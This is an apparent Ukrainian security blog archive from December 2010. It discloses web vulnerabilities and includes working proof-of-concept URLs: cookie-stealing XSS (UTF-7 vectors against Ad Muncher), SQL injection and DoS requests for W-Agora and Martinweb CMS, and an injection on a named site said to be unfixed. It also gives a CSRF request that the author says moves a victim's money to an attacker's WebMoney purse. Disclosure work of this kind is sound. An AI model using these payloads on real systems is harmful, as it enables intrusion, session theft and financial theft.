Архів для категорії 'Уразливості'

Добірка уразливостей

15:13 29.12.2010

В даній добірці уразливості в веб додатках:

  • XSS and Content Injection in HTC Windows Mobile SMS Preview PopUp (деталі)
  • SQL injection vulnerability in TCMS (деталі)
  • Local File Inclusion in TCMS (деталі)
  • SQL injection vulnerability in CompuCMS (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Unauthorized Information Disclosure, Unauthorized Data Modification, Denial of Service (DoS) (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS), Denial of Service (DoS), Execution of Arbitrary Code, Unauthorized Access (деталі)
  • SQL injection vulnerability in CompuCMS (деталі)
  • XSS vulnerability in CompuCMS (деталі)
  • HP Operations Manager for Windows, Remote Execution of Arbitrary Code (деталі)
  • XSS vulnerability in CompuCMS (деталі)

Уразливості на www.watchmouse.com

23:57 28.12.2010

У вересні, 19.09.2010, я знайшов Abuse of Functionality та Insufficient Anti-automation уразливості на сайті http://www.watchmouse.com. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти.

Abuse of Functionality:

http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl=http://google.com

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сервери самого сервісу. Один запит до даного функціоналу призведе до десяти запитів (з 10 різних серверів) до цільового сайта.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі).

Уразливість в Ad Muncher

15:29 28.12.2010

25.05.2010

Раніше я вже писав про універсальну XSS уразливість в Ad Muncher. І сьогодні я знайшов нову Cross-Site Scripting уразливість в Ad Muncher, яка має місце на місці попередної уразливості (що була виправлена в 2007 році).

Тобто я обійшов захисні фільтри програми і відновив універсальну XSS в Ad Muncher. Про що вже повідомив розробникам.

Детальна інформація про уразливість з’явиться пізніше.

28.12.2010

По замовчуванню в Ad Muncher v4.71 та наступних версіях відключене виведення поточної URL в тіло поточної сторінки (в helper script) і при цьому виправлена попередня уразливість. Але використовуючи інші вектори атаки все ще можна провести XSS атаку, коли опція ShowURLInHelper включена.

XSS:

Це універсальна XSS. Можливі reflected XSS та Saved XSS атаки з використанням даної уразливості.

Атака можлива в наступних випадках (у будь-яких браузерах):

1. На сторінках з UTF-7.

http://site/utf-7.html?--+AD4-+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-

При запиті до сторінки код автоматично виконається.

Атака може бути проведена на будь-яких сайтах, що мають UTF-7 сторінки, або дозволяють завантажувати на них веб сторінки (і таким чином можна задати кодування UTF-7).

2. На сторінках з будь-яким кодуванням окрім UTF-7.

http://site/utf-8.html?--+AD4-+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-

При відвіданні сторінки потрібно змусити жертву змінити кодування на UTF-7 і код автоматично виконається. Дана атака подібна до strictly social XSS в Mozilla та Firefox, про яку я писав в записах Cross-Site Scripting в Mozilla та Firefox та Cross-Site Scripting з UTF-7 в Mozilla та Firefox. Вона можлива в браузерах Mozilla 1.7.x та попередні версіях, Firefox 1, Firefox 2 і Firefox 3.0 та Firefox 3.0.1 (та інших браузерах, що дозволяють встановити кодування UTF-7).

Уразливі Ad Muncher v4.81 та попередні версії. В версії Ad Muncher v4.9 дана уразливість вже виправлена.

Добірка уразливостей

15:14 27.12.2010

В даній добірці уразливості в веб додатках:

Численні уразливості в W-Agora

15:06 25.12.2010

30.10.2010

У серпні, 29.08.2010, я знайшов численні уразливості в W-Agora (це система веб публікації, тобто по суті CMS) - Cross-Site Scripting, SQL DB Structure Extraction, SQL Injection та Denial of Service уразливості. Які я виявив на офіційноу сайті w-agora.net. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.12.2010

XSS:

http://site/current/search.php?bn=support_news&search_forum='%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=support&gosearch=1

SQL DB Structure Extraction:

http://site/current/search.php?bn=support_news&search_forum='&site=support&gosearch=1

SQL Injection:

http://site/current/search.php?bn=support_news&search_forum='%20or%20version()%3E'5&site=support&gosearch=1

DoS:

http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=%25
http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=
http://site/current/list.php?site=support&bn=support_news

Уразливі W-Agora 4.2.1 та попередні версії.

Уразливості на ua-hack.com

15:03 24.12.2010

23.04.2010

У жовтні, 15.10.2009, я знайшов Information Leakage та Full path disclosure уразливості на секюріті проекті http://ua-hack.com. Про що найближчим часом сповіщу адміністрацію проекту.

Торік я вже писав про взлом сайта ua-hack.com.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

23.04.2010

Information Leakage i Full path disclosure:

http://ua-hack.com/wp-content/uploads/my-md5.txt

Витік інформації про всі файли на сайті та повні шляхи на сервері до них.

Full path disclosure:

http://ua-hack.com/wp-content/plugins/belavir.php

Дані уразливості вже виправлені.

Уразливість на usm.co.ua

15:02 23.12.2010

16.10.2009

У лютому, 14.02.2009, я знайшов SQL Injection уразливість на http://usm.co.ua - сайті компанії Укрспецмонтаж, що займається системами безпеки. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

23.12.2010

SQL Injection:

http://usm.co.ua/index.php?content_id=-1%20or%20version()=5

Дана уразливість досі не виправлена.

Уразливості в Martinweb CMS

15:18 22.12.2010

11.10.2010

У червні, 22.06.2010, я знайшов Cross-Site Scripting та SQL DB Structure Extraction уразливості в Martinweb CMS (це українська комерційна CMS). Які я виявив на сайті www.kontrakt.ua, а також деякі з даних уразливостей є на сайті www.bakotech.com.ua. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.12.2010

XSS:

http://site/sitesearch/page--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.html
http://site/index.php?pages='&language=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (з MouseOverJacking):

http://site/index.php?op=search&search='style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'
http://site/index.php?op=search&pages=1'style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'

SQL DB Structure Extraction:

http://site/index.php?pages=’

Уразливі потенційно всі версії Martinweb CMS.

Business Logic уразливості на www.propage.ru

23:55 21.12.2010

Продовжу свою серсію записів про Business Logic уразливості на різних e-commerce сайтах. В статті Business Logic уразливості через CSRF я писав про Business Logic уразливості, що дозволяють маніпулювати фінансовими даними користувачів. Які можна ініціювати через CSRF атаки.

Після www.prospero.ru та procontext.ru в якості приклада таких уразливостей наведу Cross-Site Request Forgery уразливість на http://www.propage.ru - сайті рекламного брокера (біржи лінок), що мені відома ще з 2007 року. Це ще один проект Prospero. І так само, як і у випадку інших проектів даної компанії, адміни брокера не слідкують за безпекою свого сайта.

Business Logic Flaw (через CSRF):

Можна викрасти гроші користувача через CSRF-атаку. Це можна зробити через POST запит на сторінці http://www.propage.ru/balance.php, або через GET:

http://www.propage.ru/balance.php?money_out=1&pay_type=webmoney_rus&webmoney_rus_summa=1000&money_out_type=express&r_purse=R

Цим запитом ви переведете з рахунку жертви суму 1000 р. на свій R-гаманець в системі WebMoney. В параметрі money_out_type задається тип виведення - зараз в системі наявний лише тип виведення експрес (express).

Добірка уразливостей

22:49 21.12.2010

В даній добірці уразливості в веб додатках:

  • CompleteFTP v3.3.0 - Remote Memory Consumption DoS (деталі)
  • XSS vulnerability in Rumba CMS (деталі)
  • XSS vulnerability in ArtGK CMS forum (деталі)
  • HP Insight Control for Linux (IC-Linux) Remote Execution of Arbitrary Code, Local Unauthorized Elevation of Privilege (деталі)
  • XSS vulnerability in Rumba CMS tags (деталі)
  • New xulrunner packages fix several vulnerabilities (деталі)
  • XSS vulnerability in ArtGK CMS (деталі)
  • TCPDF Library Remote Code Execution Vulnerability (деталі)
  • cPanel Customer Portal (index.cgi) Xss Vulnerability (деталі)
  • JAVA web start arbitrary command-line injection - “-XXaltjvm” arbitrary dll loading (0day) (деталі)